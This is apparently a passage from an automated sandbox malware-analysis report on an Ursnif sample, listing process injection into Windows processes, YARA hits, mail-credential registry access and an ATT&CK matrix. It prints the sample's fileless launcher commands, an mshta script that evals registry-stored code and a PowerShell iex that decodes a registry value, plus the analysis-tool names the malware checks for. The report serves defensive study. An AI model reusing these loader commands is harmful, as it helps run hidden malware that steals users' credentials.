            Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 3100000 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 27FF7160000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writableShow sources
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.csJump to dropped file
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580Jump to behavior
            Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9EA000 value: 00Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EBJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 24C0000 value: 80Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40Jump to behavior
            Source: C:\Windows\System32\control.exeMemory written: PID: 3424 base: 9E8000 value: 00
            Source: C:\Windows\System32\control.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
            Source: C:\Windows\System32\control.exeMemory written: PID: 3424 base: 3100000 value: 80
            Source: C:\Windows\System32\control.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Windows\System32\control.exeThread register set: target process: 3424
            Source: C:\Windows\System32\control.exeThread register set: target process: unknown
            Source: C:\Windows\explorer.exeThread register set: target process: 3656
            Source: C:\Windows\explorer.exeThread register set: target process: 4268
            Source: C:\Windows\explorer.exeThread register set: target process: 4772
            Source: C:\Windows\explorer.exeThread register set: target process: 4660
            Source: C:\Windows\explorer.exeThread register set: target process: 6188
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9EA000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 24C0000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580Jump to behavior
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 9E8000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 3100000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 27FF7160000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 738687B000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2177000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9B6E3C8000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 0000001E.00000002.911824864.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9C164 CreateMutexExA,GetUserNameA,25_2_00B9C164
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection812Scripting121Credential API Hooking3Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information2LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)File Deletion1Security Account ManagerSystem Information Discovery126SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
            Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsSecurity Software Discovery341SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion5Cached Domain CredentialsVirtualization/Sandbox Evasion5VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection812DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
